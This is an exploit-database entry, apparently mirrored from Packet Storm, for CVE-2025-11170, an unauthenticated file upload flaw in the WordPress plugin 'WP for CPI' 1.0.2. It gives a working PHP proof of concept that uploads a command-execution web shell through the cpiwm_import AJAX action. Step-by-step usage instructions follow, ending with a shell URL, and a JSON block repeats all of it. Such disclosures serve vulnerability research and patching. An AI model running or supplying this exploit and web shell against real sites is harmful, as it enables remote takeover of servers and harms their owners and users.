📄 WordPress WP for CPI 1.0.2 Shell Upload_PACKETSTORM:212726

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

WordPress WP for CPI plugin versions 1.0.2 and below suffer from an unauthenticated shell upload vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212726

Published Dec 11, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : WP for CPI 1.0.2 Unauthenticated Arbitrary File Upload |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://discover.commoninja.com/wordpress/plugin/cpi-wp-migration |
=============================================================================================================================================

[+] Summary :

The WordPress plugin "WP for CPI" versions <= 1.0.2 suffer from an
unauthenticated arbitrary file upload vulnerability via the "cpiwm_import"
AJAX action. An attacker can upload arbitrary PHP files and achieve
remote code execution.

The vulnerable endpoint requires no authentication, nonce, or capability
checks.

Affected endpoint:
/wp-admin/admin-ajax.php?action=cpiwm_import

2. Fake Python PoC Notice
-------------------------

[+] References : https://packetstorm.news/files/id/211558/ CVE-2025-11170

A previously circulating Python PoC was analyzed and confirmed to be
non-functional, incorrect, and not aligned with the plugin’s real
behavior. The script was determined to be fake and technically invalid.

A corrected analysis and working PoC are provided below.

3. Technical Details
--------------------

The plugin exposes the action parameter:

action=cpiwm_import

The server accepts the following POST parameters:

filename - the resulting file name on disk
data - base64 encoded file contents
index - import index (not validated)

Uploaded files are saved to:

/wp-content/plugins/cpi-wp-migration/storage/{filename}

A successful upload returns the response:

0

4. Working PoC (PHP)
---------------------

<?php
/*
Corrected PoC for CVE-2025-11170
By Indoushka
*/

$target = "http://target.com"; // no trailing slash
$ajax = $target . "/wp-admin/admin-ajax.php";

$filename = "indoushka.php";
$payload = "<?php system(\$_GET['cmd']); ?>";
$data_b64 = base64_encode($payload);

$post = [
"action" => "cpiwm_import",
"filename" => $filename,
"data" => $data_b64,
"index" => "0"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Server Response: $response\n";

if(trim($response) === "0"){
echo "[+] Upload Successful!\n";
echo "Shell Path:\n";
echo $target . "/wp-content/plugins/cpi-wp-migration/storage/" . $filename . "\n";
} else {
echo "[!] Upload failed.\n";
}
?>

5. Usage Instructions
----------------------

Save the file:

poc.php

Run:

php poc.php

Access your shell:

http://target.com/wp-content/plugins/cpi-wp-migration/storage/indoushka.php?cmd=id

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-11T17:25:13",
    "description": "WordPress WP for CPI plugin versions 1.0.2 and below suffer from an unauthenticated shell upload vulnerability...",
    "published": "2025-12-11T00:00:00",
    "modified": "2025-12-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress WP for CPI 1.0.2 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212726",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-11170"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : WP for CPI 1.0.2 Unauthenticated Arbitrary File Upload                                                                      |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://discover.commoninja.com/wordpress/plugin/cpi-wp-migration                                                           |\n    =============================================================================================================================================\n    \n    [+] Summary : \n    \n    The WordPress plugin \"WP for CPI\" versions <= 1.0.2 suffer from an\n    unauthenticated arbitrary file upload vulnerability via the \"cpiwm_import\"\n    AJAX action. An attacker can upload arbitrary PHP files and achieve\n    remote code execution.\n    \n    The vulnerable endpoint requires no authentication, nonce, or capability\n    checks.\n    \n    Affected endpoint:\n        /wp-admin/admin-ajax.php?action=cpiwm_import\n    \n    \n    2. Fake Python PoC Notice\n    -------------------------\n    \n    [+] References : https://packetstorm.news/files/id/211558/ CVE-2025-11170\n    \n    A previously circulating Python PoC was analyzed and confirmed to be\n    non-functional, incorrect, and not aligned with the plugin\u2019s real\n    behavior. The script was determined to be fake and technically invalid.\n    \n    A corrected analysis and working PoC are provided below.\n    \n    \n    3. Technical Details\n    --------------------\n    \n    The plugin exposes the action parameter:\n    \n        action=cpiwm_import\n    \n    The server accepts the following POST parameters:\n    \n        filename   - the resulting file name on disk\n        data       - base64 encoded file contents\n        index      - import index (not validated)\n    \n    Uploaded files are saved to:\n    \n        /wp-content/plugins/cpi-wp-migration/storage/{filename}\n    \n    A successful upload returns the response:\n    \n        0\n    \n    \n    4. Working PoC (PHP)\n    ---------------------\n    \n    <?php\n    /*\n       Corrected PoC for CVE-2025-11170\n       By Indoushka\n    */\n    \n    $target = \"http://target.com\"; // no trailing slash\n    $ajax   = $target . \"/wp-admin/admin-ajax.php\";\n    \n    $filename = \"indoushka.php\";\n    $payload  = \"<?php system(\\$_GET['cmd']); ?>\";\n    $data_b64 = base64_encode($payload);\n    \n    $post = [\n        \"action\"   => \"cpiwm_import\",\n        \"filename\" => $filename,\n        \"data\"     => $data_b64,\n        \"index\"    => \"0\"\n    ];\n    \n    $ch = curl_init();\n    curl_setopt($ch, CURLOPT_URL, $ajax);\n    curl_setopt($ch, CURLOPT_POST, true);\n    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n    $response = curl_exec($ch);\n    curl_close($ch);\n    \n    echo \"Server Response: $response\\n\";\n    \n    if(trim($response) === \"0\"){\n        echo \"[+] Upload Successful!\\n\";\n        echo \"Shell Path:\\n\";\n        echo $target . \"/wp-content/plugins/cpi-wp-migration/storage/\" . $filename . \"\\n\";\n    } else {\n        echo \"[!] Upload failed.\\n\";\n    }\n    ?>\n    \n    \n    5. Usage Instructions\n    ----------------------\n    \n    Save the file:\n    \n        poc.php\n    \n    Run:\n    \n        php poc.php\n    \n    Access your shell:\n    \n        http://target.com/wp-content/plugins/cpi-wp-migration/storage/indoushka.php?cmd=id\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212726",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212726/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply